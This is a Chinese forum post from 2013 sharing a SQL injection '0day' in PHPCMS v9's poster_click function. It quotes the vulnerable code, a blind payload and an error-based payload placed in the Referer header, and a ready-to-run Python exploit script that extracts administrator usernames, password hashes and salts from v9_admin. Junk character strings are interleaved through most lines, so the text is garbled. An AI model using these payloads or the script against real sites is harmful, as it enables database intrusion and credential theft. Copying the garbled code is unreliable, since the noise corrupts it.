有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
8 U# Y5 I* J) ^" r% X) V
7 s9 U: Y& _$ \0 m问题函数\phpcms\modules\poster\index.php0 n$ h, ^/ J O* G9 [ ~: w2 ?6 Q
# p' M/ [. V3 ~8 M% g. E8 `3 J( l9 W3 p
public function poster_click() {5 S/ @4 I& r7 ~6 q
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
6 m+ G1 K" v) R0 k6 @/ ?2 W: g. M, E$r = $this->db->get_one(array('id'=>$id));
: R: e1 n8 t, hif (!is_array($r) && empty($r)) return false;$ J$ q& d# A; @+ z2 S
$ip_area = pc_base::load_sys_class('ip_area');
' A5 @% E1 v: i( t$ip = ip();7 z: g* ~! }+ e G) y
$area = $ip_area->get($ip);
1 Q. X- Z, h" n6 [; S5 F$username = param::get_cookie('username') ? param::get_cookie('username') : '';% g3 ^2 }, ?8 M* Q/ l
if($id) {% i' S: T P |0 Y1 j( S
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
) s- ?' x f: ?2 X6 b$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));5 u3 ?. ]; r; r0 ?0 |
}- ^5 Y$ U# Z3 ~0 U" s4 J
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
8 b5 R' u7 j k0 E' _$setting = string2array($r['setting']);7 t9 `/ p: }5 T g0 u; e5 H
if (count($setting)==1) {; Z' I! ^% J. `- r. G( X* a
$url = $setting['1']['linkurl'];& r d& v3 g+ E& d; p
} else {2 C* B. @4 ~8 m6 ?) H
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];5 B$ o% F6 I: q: o# c D+ v
}
: {6 t. {2 z8 [6 L9 w% p6 b5 n. theader('Location: '.$url);2 y& ~' S# M( ]$ X- B2 F1 M
}
- @2 }' O" Z( r* y2 g# v6 B, w7 j2 G3 \: B( @
# P; n, c6 x6 n* K3 T3 p' \( m" {8 O) g& k& y
利用方式:
& B! Q3 U1 ~+ _8 R
: T% T, C2 p, R& p3 u1 r1、可以采用盲注入的手法:
2 @% Z& n2 g+ ?! c2 G; p
% n2 a; |1 B6 M: K! I, G! t- e- Wreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
7 g6 A0 a) |/ T. }' _$ f; j& x" C- n; F5 ]* X! P: Z0 }
通过返回页面,正常与否一个个猜解密码字段。: ^% F% S; ~: J
' I- ?0 L+ V( K1 I2、代码是花开写的,随手附上了:3 n, }( N; E8 L, v9 `, P6 ~
! y4 }) }& Z, F5 @1 W! q/ v
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#& Q6 ^4 I! O2 ^, {
. i# k9 M8 p$ C' o P! ~此方法是爆错注入手法,原理自查。$ [; P3 b8 ]# L
" B' o4 |% D! ] 6 ?% C" v' A% [/ W+ ?# g* N
! k, \4 F: Q% ]* t; |2 U利用程序:
0 s8 u8 q3 M! ^% K% o A+ N& e, J4 ]% B) J
#!/usr/bin/env python& G( a' ^5 h% D* ~+ c8 }, K
import httplib,sys,re# C* S, W# _0 q- W2 T+ X, ^
- T, U( w: L; q* m# Z0 t: Mdef attack():
1 c( U$ O0 {5 iprint “Code by Pax.Mac Team conqu3r!”
1 k) W, D6 \1 x8 O" `1 uprint “Welcome to our zone!!!”3 ^5 {4 j# x) v5 G- F k* l
url=sys.argv[1]
& L* @) t" i* L7 K" Rpaths=sys.argv[2], ~! @9 G& G; U; I Q0 Y
conn = httplib.HTTPConnection(url)
" {- s( Z) r" b1 Vi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
& }* R- [2 U9 s: t“Accept”: “text/plain”,0 I5 ~ |: f% X
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
& _8 ]$ r+ u' Hconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
, p& P, Y4 Y! tr1 = conn.getresponse()) d0 A1 [$ }% h/ H4 T0 c: }
datas=r1.read()
% @5 S5 e, H. V( i: {! fdatas=re.findall(r”Duplicate entry \’\w+’”, datas)+ b! ^. J: J; W8 \7 p5 T! P
print datas[0]
5 @5 N6 i w. Y, N' W# h! Kconn.close()' U( s& n4 s& ~7 K$ ]
if __name__==”__main__”:" z! O/ T ~4 p& r X' ^
if len(sys.argv)<3:/ Z4 M) W* V) H% j7 ~% X
print “Code by Pax.Mac Team conqu3r”2 i' n0 F' ]) {2 o/ [6 E" m
print “Usgae:”
z+ C% D U0 u* Aprint “ phpcmsattack.py www.paxmac.org /”
. x6 C6 Z, C. ^; B1 ?. e5 l* d( Fprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
1 p+ \: _" c: r( n) ]sys.exit(1)
' O1 y6 v! k6 Y3 H4 r4 _attack()$ _9 z8 _% T1 s' K
6 Q [8 V' U% v8 t2 u
|
发表于 2013-1-11 21:01:00
收藏
支持
反对